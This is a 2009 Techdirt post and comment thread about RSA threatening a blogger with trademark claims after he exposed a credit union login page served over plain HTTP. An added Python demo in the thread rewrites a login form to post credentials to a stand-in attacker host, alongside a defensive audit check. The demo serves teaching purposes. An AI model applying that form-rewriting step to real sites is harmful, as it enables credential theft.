Reveal Poor Web Security... Have RSA Threaten You With Trademark Infringement

from the not-cool dept

Scott Jarkoff recently discovered a problem with the Navy Federal Credit Union website: it lets users log in from an unsecured web page. That's the type of thing we thought pretty much all banks had figured out ages ago. However, what's fascinating is what happened next. Scott received an angry email from RSA, the well-known security company, which apparently built the NFCU website, claiming trademark infringement and demanding that he take down the post. RSA was upset with the implication that the site was insecure, but rather than either fixing the problem or explaining why the site is actually safe (which they insist it is), they threatened Scott with a trademark claim because his post has a small screenshot of the NFCU website. Doesn't that make you feel secure? Since when is RSA in the business of sweeping security concerns under the rug by threatening those who point out problems with a trademark infringement claim?

Filed Under: security, trademark
Companies: navy federal credit union, rsa


Reader Comments



  • Dark Helmet (profile), 13 Aug 2009 @ 9:48am

    Yay for security

    Ok, first of all let me get this out of the way: if my last name was Jarkoff, I would have such an incredible amount of fun with it, it would be astounding. "Hey, Jarkoff, stop Jarking off..."

    Secondly, security has never been about being secure. I know, I'll take a moment while you read that again....got it? Ok, now here's what I mean: security firms in a plethora of specialties (airport security, malware security, bank security, etc.) aren't there PRIMARILY to keep things secure, they're primarily there to create the ILLUSION of security.

    Part of that means doing some real security work: scanning bags, releasing zero-day patches, carrying guns in the bank. However, you'll notice that none of that stops the determined criminal. Drug traffickers, weapons, and terrorists still make it on the plane. Malware is still relatively effective in infecting computers. Banks still get robbed with a frequency that would probably surprise the hell out of most people.

    But we fly. We visit websites. We put our money in banks.

    So no worries, little sheeple. Trust the establishment: you're safe.

    • Dark Helmet (profile), 13 Aug 2009 @ 10:00am

      Re: Yay for security

      I just noticed that I forgot to round out the entire point with my final statement in relation to the article:

      Obviously this has nothing to do with trademark. This Jarkoff (hahahaahha) is messing with RSA's created illusion of security....

      • The Infamous Joe (profile), 13 Aug 2009 @ 10:11am

        Re: Re: Yay for security

        Rants can do that, I'm told.

        In regard to your point, while I agree that much of security is based on *feeling secure* instead of actually *being secure* (I'm looking at you, Every-Airport-In-America!), I think that another side of it is that "security" is a constant, on-going battle. Also, there needs to be a balance of usability and convenience when regarding security. Your house would be pretty damn secure if it had no doors or windows, but it wouldn't be a very useful house.

        With that in mind, I wouldn't freak out about a flaw discovered in my bank's online site as long as it was quickly patched instead of hushed up-- If I were NavyFCU, I'd look for someone else to build my website, pronto.

    • Anonymous Coward, 13 Aug 2009 @ 10:08am

      Re: Yay for security

      On the other hand, the illusion of security is far more effective at creating safety than actual security.

      Banks don't care about getting robbed. A few thousand dollars stolen won't shut a bank down, but customers scared to make bank deposits will.

      Most malware is only found through extensive use of computers and after a large number of infections (just like a biological disease), and malware security is most effective when a problem has already been discovered. If everyone was afraid of getting infected, the chances of discovering issues would be less and less.

      And on a more pessimistic note, the more people that fly on airplanes, the safer you personally will be. Granted, if very few people used airplanes, then security would be more effective...but since that extreme isn't possible, the other extreme ends up being almost as good.

    • johnboy, 25 Jan 2011 @ 11:22am

      Re: Yay for security

      Would like to see stats on how "secure" the web really is, or, as I feel, "is not." Can someone tell me who is legally liable for "web security"? How safe are bank and credit card security systems? Seems as though "identity theft" is rampant, or at minimum not very risky for hacker crooks!

  • The Infamous Joe (profile), 13 Aug 2009 @ 9:54am

    So..

    So The RSA is alleging that Scott is trying to start a Credit Union called Navy Federal Credit Union and it might mislead some customers?

    Or.. is that not what trademarks are for these days?

    • Sean T Henry (profile), 13 Aug 2009 @ 10:36am

      Re: So..

      Also, I would assume that RSA was contracted to create the site. So if it was created under contract, the completed work would be the property of the Navy Federal Credit Union, and it would be NFCU who could claim infringement. RSA does not own said website, just created it.

    • chris (profile), 13 Aug 2009 @ 12:39pm

      Re: So..

      Or.. is that not what trademarks are for these days?

      trademark might have been used to help consumers in like the 60's or something, but today copyright and trademark are about stifling free speech.

      you use trademark and copyright to force people to remove content that you don't like.

  • Lonzo5, 13 Aug 2009 @ 9:55am

    The thing that gets me is: RSA will actually pay lawyers to defend this if it goes to court. Disquieting. Do they even care how this makes them look?

  • This is getting f***king rediculous, 13 Aug 2009 @ 9:57am

    Seriously.

    Screenshots should NOT be trademark infringement. It's so stupid I can't even begin to rant about it.

    This just furthers my already existing hatred for stupid people.

  • Paul Brinker, 13 Aug 2009 @ 10:05am

    Navy Fed Customer

    As a Customer I am not happy at all at this event, I worry a lot because most of Navy Fed's services can be done via its web portal with no face time (its main customers are military)

    So yes, I would be really mad if this got out and was not fixed.

  • barrenwaste (profile), 13 Aug 2009 @ 10:05am

    Re: Lonzo5

    The truly stupid thing is, it's all image related, Lonzo. The only legal way they could get him for trademark infringement is if they claim his use of their name endorsed or improved marketing of his product. In other words, they don't want to be associated with or potentially endorsing their own screw up. To top it all off, legally there is no way they can win the case on these grounds, and I am certain they know that.

  • Jess, 13 Aug 2009 @ 10:14am

    Printscreen

    I say Microsoft should be sued for allowing the print screen key to allow for the possibility of trademark infringement

    :)

    -J

  • Greg, 13 Aug 2009 @ 10:37am

    Well, I guess this is the first time I've ever actually been glad I moved all my accounts out of NFCU.

  • Trails, 13 Aug 2009 @ 10:40am

    A technical point

    "explaining why the site is actually safe (which they insist)"

    It's not. It cannot be.

    The page html being sent from the nfcu server to the user's machine is sent in the clear, and subject to man-in-the-middle injection attacks.

    The request upon login, going from the user's machine to nfcu server is encrypted, but that's shutting the barn door after the horses have run off.

    I do this stuff for a living, and I can assert that this is a very well known, obvious, exploitable, and basic insecurity. It flouts common best practices, and is stunning in its obviousness. It's a no-brainer for anyone involved in web security.

    • Mike Masnick (profile), 13 Aug 2009 @ 10:45am

      Re: A technical point

      It's not. It cannot be.

      Right. I agree. But in the correspondence RSA seemed to insist it was... so I wanted to leave that open to them as an out. But, yeah, it sure looks like this is a really really old and basic mistake.

      • Trails, 13 Aug 2009 @ 11:56am

        Re: Re: A technical point

        I'm not trying to point out a perceived flaw in your article, just adding a technical point.

      • Keven Sutton, 13 Aug 2009 @ 12:29pm

        Re: Re: A technical point

        It's possible to have the log-in page on an HTTP site, fill out the fields and have all of the field data sent over HTTPS. That would make the log-in safe.
        That being said, if it reverts to HTTP, the page being displayed afterwards gets cached, which can lead to insecurity. Perhaps this is what they meant when they said it was secure anyway.

        Either way, having the log-in page as HTTPS is still a good Idea. It provides a reassurance that the web engineer didn't forget something as simple as making the log-in go over a secure connection.

        • Dark Helmet (profile), 13 Aug 2009 @ 12:47pm

          Re: Re: Re: A technical point

          "Either way, having the log-in page as HTTPS is still a good Idea. It provides a reassurance that the web engineer didn't forget something as simple as making the log-in go over a secure connection."

          Kevin, totally NOT saying you're wrong or anything, just asking for an opinion on what you said: doesn't that sound like EXACTLY what I was saying about creating the illusion or appearance of safety being a chief priority?

          [patting self on back]

          • Keven Sutton, 13 Aug 2009 @ 4:46pm

            Re: Re: Re: Re: A technical point

            As far as a User perspective of security, yes; the appearance of security is very important.

            From the other side though, as a bit of an I.T. security specialist (mostly a hobby), there needs to be some substance behind that perceived security. You can create the illusion of security, but if you try to monetize that illusion it might be successful for a very short period, but will have no long-term profitability. If you have high security and the illusion of insecurity, you'll have to fight against people's concepts that you are a poor security solution. (See many open source security solutions: the best thing out there, but because you can see the source code, managers who have little understanding of the programs themselves think that they are inherently more insecure.)

        • NotFromToronto (profile), 13 Aug 2009 @ 12:49pm

          Re: Re: Re: A technical point

          I work for a large financial services company. I can assure you that having the login page under SSL is more than just a good idea... it's an absolute requirement.

          The problem with an initial page has nothing to do with where it is supposed to post its contents to. The problem is that because it is sent unsecured, the contents could be altered in-flight, and the posting destination could be changed. If done well, the customer doesn't even know his account details have been compromised.

          Shameful way to deal with this from RSA.

    • Fushta, 13 Aug 2009 @ 11:01am

      Re: A technical point

      Indeed. I think we all agree that the webmaster made a mistake. Mike is pointing out the improper reaction from RSA in going after the guy for trademark infringement.

      Is it being used for commercial purposes? Nope.

      Is it being used to trick people into thinking the RSA endorses the "exposer?" Nope.

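The in-flight rewrite that Trails and NotFromToronto describe in the thread above, as an added example that is not from the Techdirt post or from any commenter: a login form delivered over plain HTTP, whose action already points at HTTPS (the arrangement Keven Sutton's comment calls safe), is rewritten before the browser renders it, so the credentials go to a host of the attacker's choosing while the page looks identical. It also contrasts the insufficient check (does the form post to HTTPS?) with the one a reviewer actually wants (is the page carrying the form itself served over HTTPS?). The host names bank.example and evil.example, the HTML, and every function name are assumptions made for the demo; the `mitm_rewrite` regex stands in for what a rewriting proxy on the path would do.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page: served over plain HTTP, but the form itself posts to
# HTTPS. bank.example and evil.example are placeholder hosts for the demo only.
LOGIN_PAGE = """<html><body>
<form id="login" method="post" action="https://bank.example/auth/login">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
</body></html>"""


class FormCollector(HTMLParser):
    """Record every <form>, its resolved action URL, and whether it holds a password field."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or empty action posts back to the page's own URL.
            self._current = {"action": urljoin(self.page_url, a.get("action") or ""),
                             "has_password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_forms(page_url, html):
    """Forms on the page that collect a password, with their absolute action URLs."""
    parser = FormCollector(page_url)
    parser.feed(html)
    return [f for f in parser.forms if f["has_password"]]


def form_actions_are_https(page_url, html):
    """The insufficient check: only looks at where the form says it will post."""
    return all(urlsplit(f["action"]).scheme == "https"
               for f in credential_forms(page_url, html))


def audit(page_url, html):
    """The check a reviewer wants: the page carrying the form must itself be HTTPS,
    and every credential form must post over HTTPS. Returns a list of findings."""
    findings = []
    scheme = urlsplit(page_url).scheme
    if scheme != "https":
        findings.append("login page delivered over %s: an on-path attacker can rewrite "
                        "the form before the user ever sees it" % scheme)
    for f in credential_forms(page_url, html):
        if urlsplit(f["action"]).scheme != "https":
            findings.append("credential form posts in the clear to %s" % f["action"])
    return findings


def mitm_rewrite(html, attacker_action):
    """What an on-path attacker does to an HTTP response: swap the form's action.
    A single regex stands in for a rewriting proxy; the rendered page is unchanged."""
    return re.sub(r'action="[^"]*"', 'action="%s"' % attacker_action, html)


if __name__ == "__main__":
    page_url = "http://bank.example/"          # how the page is actually served
    print("as served:", audit(page_url, LOGIN_PAGE))
    tampered = mitm_rewrite(LOGIN_PAGE, "https://evil.example/collect")
    print("after MITM, form still 'posts to HTTPS':",
          form_actions_are_https(page_url, tampered))
    print("credentials now go to:", credential_forms(page_url, tampered)[0]["action"])
    print("fixed (page itself on HTTPS):", audit("https://bank.example/", LOGIN_PAGE))
```

Run as a script: the tampered page still passes the form-action check, because the attacker is free to point the form at an HTTPS host of his own, which is why the audit keys on the scheme of the page URL rather than on what the form claims. Serving the same HTML over HTTPS is the only change that clears the audit.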

  • PRMan, 13 Aug 2009 @ 10:56am

    Those who can't innovate, litigate

    I guess RSA is done innovating...

  • Overcast (profile), 13 Aug 2009 @ 11:11am

    Streisand Alert:

    Thanks for letting me know, I work for a Fortune 100, and feel obligated to pass on the information - because security for the network I work on is greater than caressing RSA's ego.

    Should have quietly fixed it RSA.

  • Freedom, 13 Aug 2009 @ 1:24pm

    Old School and High Priced...

    This logic just amazes me:

    Public site/public author makes credible criticism about a relatively high-profile site your company was contracted to make....

    What are your options:

    Option A. Threaten individual author with bogus trademark case. After all, someone that has already gone public won't release our threat letter in a public forum and make the issue worse or anything - nah, definitely not that. Of course, lawyers are cheap as well so this will be a slam dunk - low cost, easy fix - hear no security flaws, see no security flaws - the lawyers can make it all go away! Hmmm.. I wonder if the guy might be right, never mind, legal will take care of it for us!

    Option B. Take two minutes (or more likely with overhead - 4 weeks), fix the initial page so that it is SSL based and take this as an opportunity to show how you handle mistakes in a professional manner.

    Option C. Just ignore it...

    With the economy like it is, I sure hope that the person at RSA that made this decision has some backup options as I wouldn't want to be part of the soon-to-be upcoming meeting on this issue!

    Freedom

  • Bobby Boulders (profile), 14 Aug 2009 @ 9:00pm

    WTF everyone? Why does it have to be this way? I have been with Navy Fed for over 12 years. Never ONCE have I had a problem, an issue, or a security concern. Please DON'T make NFCU the bad guy here... If the RSA is gonna be on "A-Hole Mode" then blame RSA. Besides, if NFCU has a security concern, they will take care of it. So STFU you haters and don't worry about MY credit union. They are awesome.

  • Dave, 2 Sep 2009 @ 9:18am

    NFCU ignores us

    I got my first NFCU account almost 40 years ago. I still do most of my banking there. BUT be aware, their only, repeat only, claim to fame is being the largest credit union. They are nowhere near the best. Indeed, they are simply a marginal organization that has let the world pass them by when it comes to on-line services and a willingness to quickly react to problems and clearly respond to complaints.

    NFCU is now sooooo big, they contract out most of their services just like any other multinational. The layers of management make it almost impossible to get quick resolution to any problems an individual member may have.

    In fact, they have the best "form answer" letters in the business that make it seem they care, when they really just want you to go away. Complain, and they will bluntly tell you something like "moving forward, you need to use the proper" whatever....

    This week, you can hardly get around their web site to do your on-line banking without locking up. I began just today the lengthy process of severing my relation with them. And guess what? They will not even care.
